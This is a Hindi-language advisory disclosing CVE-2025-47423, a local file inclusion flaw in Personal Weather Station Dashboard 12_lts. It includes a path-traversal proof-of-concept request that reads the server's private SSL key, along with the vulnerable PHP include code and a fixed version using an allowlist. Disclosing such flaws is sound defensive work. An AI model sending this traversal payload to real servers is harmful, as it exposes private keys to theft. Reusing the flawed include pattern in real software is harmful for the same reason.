
CVE-2025-47423 का विस्तृत खुलासा: Personal Weather Station Dashboard 12_lts में स्थानीय फ़ाइल समावेशन। इसमें PoC, असुरक्षित कोड विश्लेषण, और रक्षात्मक सीखने के लिए सुरक्षित सुधार सिफारिशें शामिल हैं।
खोजकर्ता: मैथ्यू ईगल
स्थिति: सार्वजनिक प्रकटीकरण
रिपोर्ट तिथि: 2025-05-05
CVE ID: CVE-2025-47423
Personal Weather Station Dashboard संस्करण 12_lts में एक स्थानीय फ़ाइल समावेशन (LFI) भेद्यता, अनधिकृत दूरस्थ हमलावरों को सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देती है। इस दोष का शोषण करने से निजी SSL कुंजियों सहित संवेदनशील फ़ाइलों तक पहुँच मिलती है, जो संभावित रूप से HTTPS कनेक्शनों की गोपनीयता और अखंडता से समझौता कर सकती है।
/others/_test.phptest (GET के माध्यम से)यह दोष दूरस्थ हमलावरों को अनुमति देता है:
server.key) उजागर करनाCVSS: 5.8 मध्यम
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
प्रतिक्रिया:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
str_replace निर्देशिका ट्रैवर्सल को रोकने के लिए पर्याप्त नहीं है।
basename() के साथ इनपुट को स्वच्छ करें और अनुमत फ़ाइलों के विरुद्ध जाँच करें$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Invalid test file.");
}
include(__DIR__ . '/scripts/' . $script);
| तिथि | घटना |
|---|---|
| 2025-05-05 | भेद्यता PWS डैशबोर्ड मॉडरेटर्स को रिपोर्ट की गई |
| 2025-05-06 | स्वीकृति और परीक्षण देखा गया |
| 2025-05-07 | MITRE के माध्यम से CVE-2025-47423 आरक्षित |
| TBD | सार्वजनिक पैच और CVE सूचीकरण लंबित |
यदि आप Personal Weather Station Dashboard 12_lts चला रहे हैं, तो आपको:
_test.php को हटाएँ या अपडेट करेंभेद्यता की खोज और जिम्मेदारीपूर्वक प्रकटीकरण मैथ्यू ईगल द्वारा
संपर्क: [email protected]
प्रकटीकरण जिम्मेदार प्रकटीकरण दिशानिर्देशों के अनुपालन में समन्वित किया गया। यह दस्तावेज़ शैक्षिक और रक्षात्मक उद्देश्यों के लिए जारी किया गया है।